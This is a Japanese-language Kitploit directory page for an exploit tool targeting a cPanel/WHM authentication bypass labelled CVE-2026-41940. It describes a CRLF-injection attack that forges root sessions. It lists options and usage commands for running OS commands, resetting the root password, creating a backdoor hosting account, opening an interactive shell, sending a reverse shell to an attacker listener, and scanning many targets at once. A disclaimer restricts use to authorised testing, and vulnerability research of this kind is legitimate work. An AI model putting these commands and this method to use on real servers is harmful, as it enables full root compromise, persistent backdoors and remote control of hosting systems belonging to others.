Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940 — cPanel/WHM 認証バイパス (ゼロデイ脆弱性) | Kitploit
ツール/GitHubGitHub/christian93111/cve-2026-41940
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール認証学習と教育レッドチーミングペイロード開発
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM 認証バイパス (ゼロデイ脆弱性)

10243ヶ月前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-41940: cPanel/WHM 認証バイパス(シングル & マルチターゲット)

免責事項: このドキュメントおよび関連スクリプト (exploit.py) は、教育目的、セキュリティ研究、および許可された侵入テストのためにのみ提供されます。所有していない、または明示的なテスト許可がないシステムに対してこのソフトウェアを使用しないでください。

概要

exploit.py は、cPanel & WHM の認証バイパス脆弱性 (CVE-2026-41940) を実証するスクリプトです。この脆弱性により、認証されていない攻撃者が CRLF インジェクションの欠陥を介してデーモンキャッシュに root セッションを注入でき、最終的に有効な資格情報を必要とせずに root レベルの WHM アクセスを取得できます。

脆弱性分析とエクスプロイトフロー

エクスプロイトは、Basic 認証処理メカニズム内の CRLF (キャリッジリターン・ラインフィード) インジェクション脆弱性と、セッション伝播の欠陥を組み合わせて利用します。スクリプトは攻撃を4つのステージで自動化します:

  1. 事前認証セッションの鋳造: 公開ログインエンドポイント (例: /login/ または /cgi/login.cgi) に接続し、ベースラインの未認証セッションクッキー (whostmgrsession) を取得します。
  2. CRLF インジェクション: Base64 エンコードされたペイロードを含む細工された Basic 認証ヘッダーを送信し、root セッションフィールドを直接 cpsrvd セッションキャッシュに注入します。サーバーのリダイレクト応答により、生成されたセキュリティトークン () が漏洩します。
cpsess
  • セッション伝播: 生のセッションクッキーを認証済み WHM エンドポイントに送信し、do_token_denied をトリガーして偽造されたセッションをデーモンキャッシュに伝播させ、有効な認証済みセッションにします。
  • 検証: 偽造されたセッションを使用して制限された WHM API エンドポイント (例: /json-api/version) にアクセスし、root レベルのアクセスを確認します。

  • 前提条件

    • Python 3.x
    • requests ライブラリ
    root@kitploit:~
    pip install requests
    

    使用方法

    root@kitploit:~
    python exploit.py --target <URL> [options]
    python exploit.py --target-file <FILE> [options]
    

    引数

    ターゲット選択

    ArgumentDescription
    --target URL単一の WHM URL (例: https://target:2087)
    --target-file FILEターゲットが書かれたファイル (1行に1つの ip:port) — 自動的にチェックモードを有効化

    ネットワーク & コアオプション

    ArgumentDescription
    --threads Nマルチターゲットモードの同時スレッド数 (デフォルト: 10)
    --hostname HOSTHost ヘッダーを上書き — 自動検出が失敗した場合や誤ったホスト名が使用された場合に使用
    --timeout Nリクエストごとのタイムアウト (秒) (デフォルト: 15)
    --retries Nネットワークエラー時のリトライ回数 (デフォルト: 3)
    --cookie-name NAME特定のセッションクッキー名を強制 (省略時は自動検出)
    --no-verifyステージ4の検証をスキップして続行

    エクスプロイトオプション (バイパス後)

    ArgumentDescription
    --checkチェックのみモード — 悪用せずに脆弱性を確認 (--target-file で自動設定)
    --password PASSroot パスワードを PASS に変更
    --api FUNC特定の WHM JSON-API 関数を呼び出す
    --api-params K=V,...--api のカンマ区切りパラメータ
    --exec CMDWHM scripts/run_script 経由で OS コマンドを実行 (フォールバック: rawexec)
    --sessionroot ワンクリックログイン URL を生成 — すぐに開いてください、トークンはすぐに期限切れになります
    --shell対話型 WHM シェルを起動 (単一ターゲットのみ)
    --dumpサーバー情報をダンプ: バージョン、アカウント、DNS ゾーン、権限
    --add-user USER PASS DOMAIN新しい cPanel ホスティングアカウントを作成
    --revshell LHOST LPORTbash リバースシェルをリスナーに送信

    出力オプション

    ArgumentDescription
    --output FILEセッショントークンと詳細を JSON ファイルに保存

    使用例

    root@kitploit:~
    # Check if target is vulnerable
    python exploit.py --target https://target:2087 --check
    
    # Dump server info (version, accounts, privileges)
    python exploit.py --target https://target:2087 --dump
    
    # Generate a one-click root login URL (paste in browser immediately)
    python exploit.py --target https://target:2087 --session
    
    # Execute a command
    python exploit.py --target https://target:2087 --exec "id"
    
    # Drop into an interactive WHM shell
    python exploit.py --target https://target:2087 --shell
    
    # Change root password
    python exploit.py --target https://target:2087 --password 'NewP@ss!'
    
    # Call WHM API directly
    python exploit.py --target https://target:2087 --api version
    python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
    
    # Create a backdoor cPanel account
    python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
    
    # Send reverse shell
    python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
    
    # Override hostname (use when auto-discovery fails)
    python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
    
    # Scan multiple targets (check-only mode)
    python exploit.py --target-file ips.txt
    python exploit.py --target-file ips.txt --threads 20
    
    # Save session to file
    python exploit.py --target https://target:2087 --dump --output results.json
    

    対話型シェルコマンド

    --shell 使用時には以下のコマンドが利用可能です:

    CommandDescription
    api <function> [k=v ...]WHM JSON-API 関数を呼び出す (例: api version)
    exec <command>WHM 経由で OS コマンドを実行 (例: exec id)
    passwd <newpass>root パスワードを変更
    dumpサーバー情報をダンプ
    revshell <lhost> <lport>リバースシェルを送信
    add <user> <pass> <domain>cPanel アカウントを作成
    save <path>現在のセッションをファイルに保存
    exit / quitシェルを終了

    注意事項

    最新の cPanel/WHM セキュリティパッチを直ちに適用してください。

    ツールをダウンロード